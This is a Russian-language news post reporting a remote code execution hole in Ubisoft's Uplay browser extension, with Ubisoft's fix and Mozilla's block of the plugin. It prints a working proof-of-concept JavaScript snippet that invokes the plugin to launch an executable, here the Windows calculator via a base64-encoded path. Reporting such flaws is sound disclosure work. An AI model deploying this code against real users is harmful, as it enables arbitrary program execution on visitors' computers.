В программе Uplay от компании Ubisoft вчера была обнаружена серьёзная уязвимость, которая представляет собой бэкдор на компьютеры миллионов пользователей, установивших игры от компании Ubisoft, такие как Assassin's Creed, Beowulf, Heroes of Might and Magic VI, Tom Clancy's Splinter Cell и прочие. Вместе с игрой на их компьютер установилась система Uplay DRM и расширение к браузеру.

Так вот, с помощью специального кода через это расширение можно получить доступ в систему пользователя с любого сайта.

Демо (в качестве примера запускает у вас на компьютере программу «Калькулятор»).

Код:

Выделить код

Код:

var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")

Компания Ubisoft уверяет, что бэкдор не был специально встроен в систему, а это просто ошибка в коде. Они уже выпустили обновлённую версию Uplay, которую можно скачать с официального сайта.

Но программа не обновляется автоматически и она установлена на миллионах компьютеров, для очень многих риск безопасности сохраняется. Поэтому Mozilla сегодня приняла решение полностью заблокировать расширение Uplay для всех пользователей.